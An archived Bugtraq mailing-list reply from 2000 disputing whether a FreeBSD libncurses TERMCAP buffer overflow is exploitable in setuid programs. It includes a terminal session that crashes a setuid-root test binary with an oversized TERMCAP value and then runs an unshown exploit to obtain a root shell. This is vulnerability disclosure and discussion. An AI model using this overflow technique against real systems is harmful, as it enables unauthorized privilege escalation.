Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: freebsd libncurses overflow

From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Tue, 25 Apr 2000 10:50:42 +0200


Furthermore, it is not actually a vulnerability. It seems that setuid
programs will not accept an alternate termcap file via TERMCAP even under
the old version of ncurses in FreeBSD 3.x. Therefore this "exploit" can
only be used on your own binaries.


Sure?

lubi:venglin:~> uname -a
FreeBSD lubi.freebsd.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #1: Wed Mar  1
11:18:54 CET 2000
venglin () lubi freebsd lublin pl:/mnt/elite/usr/src/sys/compile/GADACZKA  i386
lubi:venglin:~> cat dupa.c
main() { initscr(); }
lubi:venglin:~> cc -o d dupa.c -lncurses
lubi:venglin:~> su
s/key 76 ve15188
Password:
lubi:venglin:/home/venglin# chmod 4755 d ; chown root.wheel d
lubi:venglin:/home/venglin# exit
lubi:venglin:~> ./d
lubi:venglin:~> setenv TERMCAP `perl -e 'print "A"x5000'`
lubi:venglin:~> ./d
Segmentation fault
lubi:venglin:~> ./dupaexp 4000
ret: 0xbfbfba8c
# id
uid=0(root) gid=1001(users) groups=1001(users), 0(wheel)

Obviously, *most* binaries are dropping root privileges before using any ncurses
functions.

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *
Previous By Date Next
Previous By Thread Next

Current thread: